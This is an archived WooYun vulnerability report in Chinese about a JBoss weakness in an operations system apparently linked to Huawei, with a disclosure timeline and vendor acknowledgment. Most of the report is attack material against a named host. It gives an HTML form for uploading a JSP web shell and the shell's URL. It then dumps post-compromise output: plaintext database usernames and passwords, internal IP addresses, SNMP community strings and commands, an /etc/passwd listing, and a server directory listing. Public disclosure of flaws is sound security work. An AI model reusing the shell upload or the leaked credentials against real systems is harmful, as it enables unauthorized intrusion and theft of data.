乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-04: 细节已通知厂商并且等待厂商处理中 2015-01-04: 厂商已经确认,细节仅向厂商公开 2015-01-14: 细节向核心白帽子及相关领域专家公开 2015-01-24: 细节向普通白帽子公开 2015-02-03: 细节向实习白帽子公开 2015-02-18: 细节向公众公开
华为某运维系统JBoss漏洞
好像是华为在外国某地区的关于2G,3G,4G设备的系统地址http://tms.mshcpt.nethttp://tms.mshcpt.net:7007/eomsexp:
<html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>jsp-test</title></head><style>.main{width:980px;height:600px;margin:0 auto;}.url{width:300px;}.fn{width:60px;}.content{width:80%;height:60%;}</style><script> function upload(){ var url = document.getElementById('url').value, content = document.getElementById('content').value, fileName = document.getElementById('fn').value, form = document.getElementById('fm'); if(url.length == 0){ alert("Url not allowd empty!"); return ; } if(content.length == 0){ alert("Content not allowd empty!"); return ; } if(fileName.length == 0){ alert("FileName not allowd empty!"); return ; } form.action = url; form.submit(); }</script><body><div class="main"> <form id="fm" method="post"> URL:<input type="text" value="http://url/upload5warn/shell.jsp" class="url" id="url" /> FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" /> <a href="javascript:upload();">Upload</a><br/> <textarea id="content" class="content" name="t" ></textarea> </form></div></body></html>
上传得到shellhttp://tms.mshcpt.net:7007/upload5warn/css.jsp 华为的东西好高大尚,看不懂啊。
dataSource.driverClassName=oracle.jdbc.driver.OracleDriverdataSource.url=jdbc:oracle:thin:@10.5.94.3:1521:tmsdataSource.username=eomshcptdataSource.password=eomshcpt?#oracle 数据源配置 选择方式1或者方式2#方式1:读取下面配置#dataSource.driverClassName=oracle.jdbc.driver.OracleDriver#dataSource.url=jdbc:oracle:thin:@10.5.94.3:1521:tms#dataSource.username=eomshcpt#dataSource.password=eomshcpt#dataSource.maxActive= 12 #方式2:读取jboss中的oracle-ds配置#dataSource.jndiName=java:jndi_eoms#dataSource1.driverClassName=oracle.jdbc.driver.OracleDriver#dataSource1.url=jdbc:oracle:thin:@10.162.11.98:1521:loushang#dataSource1.username=l5#dataSource1.password=l5#dataSource2.jndiName=jndi_eoms#db2 数据源配置#dataSource.driverClassName=com.ibm.db2.jcc.DB2Driver#dataSource.url=jdbc:db2://10.162.12.98:50000/osgi#dataSource.username=db2admin#dataSource.password=ls5#sql server2000 数据源配置#dataSource.driverClassName=com.microsoft.jdbc.sqlserver.SQLServerDriver#dataSource.url=jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=loushang#dataSource.username=sa#dataSource.password=sa#sql server2005 数据源配置#dataSource.driverClassName=com.microsoft.sqlserver.jdbc.SQLServerDriver#dataSource.url=jdbc:sqlserver://localhost:1433;DatabaseName=loushang#dataSource.username=sa#dataSource.password=sa#mysql 数据源配置#dataSource.driverClassName=org.gjt.mm.mysql.Driver#dataSource.url=jdbc:mysql://10.13.1.183:3306/loushang?useUnicode=true&characterEncoding=utf-8#dataSource.username=root#dataSource.password=root
<?xml version="1.0" encoding="UTF-8"?><NBI version="NBI4"> <!-- "SystemName"标签中是整个接口程序的名称。该名称必须与数据库中OMC表格中的名称一样。 外界系统向接口程序发送命令时,该SystemName就是目标模块的名称。接口程序间该名称是互斥的。--> <SystemName>HWU2000SNMP@@@U2000_196</SystemName> <EmsIp id="1">10.16.11.11</EmsIp> <!-- 标示发送告警的EMS,代码中没有用到 --> <SnmpTrapListenPort>5555</SnmpTrapListenPort> <Community>private</Community> <FMAlarmCollect name="U2000-SNMP"> <!-- The attribute of the OMC --> <OMCPrivate> <!--u2000所在服务器的IP地址/设置u2000mib节点的端口号 --> <RemoteSnmpAgent>10.16.11.11/9999</RemoteSnmpAgent> <!--u2000同步开始的节点--> <syncStartOid>1.3.6.1.4.1.2011.2.15.1.7.7.4.0</syncStartOid> <!--u2000同步结束的节点--> <syncEndOid>1.3.6.1.4.1.2011.2.15.1.7.7.5.0</syncEndOid> <!--U2000同步开始时间可以都不配置,既查询所有有效告警 可是只配置同步开始时间,那么结束时间即为当前系统时间 如果给出了结束时间,就必须给出开始时间--> <syncStartTime>20101128120000</syncStartTime><!--配置同步开始开始时间(YYMMDDhhmmss)--> <syncEndTime>20101129120000</syncEndTime><!--配置结束时间(YYMMDDhhmmss)--> <!--shell命令实现同步--> <syncStartCmd>SNMP4J -c private -v 2c -p SET udp:10.13.49.205/9812 1.3.6.1.4.1.2011.2.15.1.7.7.4.0={s}10.13.57.53:6666</syncStartCmd> <syncEndCmd>SNMP4J -c private -v 2c -p SET udp:10.13.49.205/9812 1.3.6.1.4.1.2011.2.15.1.7.7.5.0={s}10.13.57.53:6666</syncEndCmd> <syncMode>new</syncMode> </OMCPrivate> </FMAlarmCollect> <EventFilter name="Context_Filter"> <Filter filter_flag="pass" name="filter alarm">EventName=MW_LOF|EventName=MW_RDI|EventName=ETH_LOS|Func_Type=Sync_StartMark|Func_Type=Sync_EndMark</Filter> <Filter filter_flag="unpass" name="filter alarm1">FaultFlag=Change|FaultFlag=Acknowledge</Filter> </EventFilter> <!--*********************************************** StringEvent2QueueJms ****************************************************************--> <EventOperator name="Send_2_JMS"> <URL>jnp://${FMP_APP_IP}:17201</URL> <ContextFactory>org.jnp.interfaces.NamingContextFactory</ContextFactory> <ConnFactory>ConnectionFactory</ConnFactory> <Destination>Alarm_Queue</Destination> </EventOperator> </NBI>
<?xml version="1.0" encoding="UTF-8"?><NBI version="NBI4"> <!-- "SystemName"标签中是整个接口程序的名称。该名称必须与数据库中OMC表格中的名称一样。 外界系统向接口程序发送命令时,该SystemName就是目标模块的名称。接口程序间该名称是互斥的。--> <SystemName>PMSOCKET@@@PM4H</SystemName> <!-- 服务端的监听端口 --> <ListenPort>17891</ListenPort> <!-- 服务端的Hostname --> <OMCIP>10.13.57.5</OMCIP> <!--*********************************************** EventFilter ****************************************************************--> <EventFilter name="Context_Filter"> <Filter filter_flag="unpass" name="filter alarm">Category=Event\n.*?Severity=Major</Filter> <Filter filter_flag="unpass" name="filter alarm1">Category=Event\n.*?Severity=Minor</Filter> <Filter filter_flag="unpass" name="filter alarm2">Category=Event\n.*?Severity=Warning</Filter> </EventFilter> <!--*********************************************** StringEvent2QueueJms ****************************************************************--> <EventOperator name="Send_2_JMS"> <URL>jnp://10.16.1.24:17201</URL> <ContextFactory>org.jnp.interfaces.NamingContextFactory</ContextFactory> <ConnFactory>ConnectionFactory</ConnFactory> <Destination>Alarm_Queue</Destination> </EventOperator> </NBI>
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bashbin:x:1:1:bin:/bin:/bin/bashdaemon:x:2:2:Daemon:/sbin:/bin/bashftp:x:40:49:FTP account:/srv/ftp:/bin/bashgames:x:12:100:Games account:/var/games:/bin/bashgdm:x:50:106:Gnome Display Manager daemon:/var/lib/gdm:/bin/falsehaldaemon:x:101:102:User for haldaemon:/var/run/hal:/bin/falselp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bashmail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/falseman:x:13:62:Manual pages viewer:/var/cache/man:/bin/bashmessagebus:x:100:101:User for D-BUS:/var/run/dbus:/bin/falsenews:x:9:13:News system:/etc/news:/bin/bashnobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bashntp:x:74:105:NTP daemon:/var/lib/ntp:/bin/falseoracle:x:102:103:Oracle user:/home/oracle:/bin/bashpostfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/falseroot:x:0:0:root:/root:/bin/bashsshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/falsesuse-ncc:x:103:107:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bashuucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bashwwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/falseinspur:x:1000:100:inspur:/home/inspur:/bin/bashtm:x:1001:1000::/home/tm:/bin/bashossadmin:x:1004:100::/home/ossadmin:/bin/bashtms:x:1005:1000::/home/tms:/bin/bash
/opt/netwatcher/tm/tmserver/bin目录下
a.ca.plclasspath.shCodeX.phpcoredefault.gif.1default.gif.2dordos1.txtdos1.txt.1eomsrun_bak_0403.sheomsrun_bak_0927.sheomsrun.shjboss_init_hpux.shjboss_init_redhat.shjboss_init_suse.shlastmasterMemoryMonitoring.shMemoryMonitoring.sh.bak.20140513MemoryMonitoring.sh.bak.20140613MemoryMonitoring_ws.shminimini.zipnc.plnc.zipprct1probe.batprobe.shqe3.plrun.batrun.bat.bkrun.confrun.jarrun.shshutdown.batshutdown.jarshutdown.shss.phpstartTMS.shstartTMS.sh.2Gtmp.txttwiddle.battwiddle.jartwiddle.shweblist.txtwsconsume.batwsconsume.shwsprovide.batwsprovide.shwsrunclient.batwsrunclient.shwstools.batwstools.shxxx2xx.txtxxx.php
看起来有前人来过
打补丁
危害等级:高
漏洞Rank:18
确认时间:2015-01-04 17:18
已通知其进行整改。感谢白帽子提醒。
暂无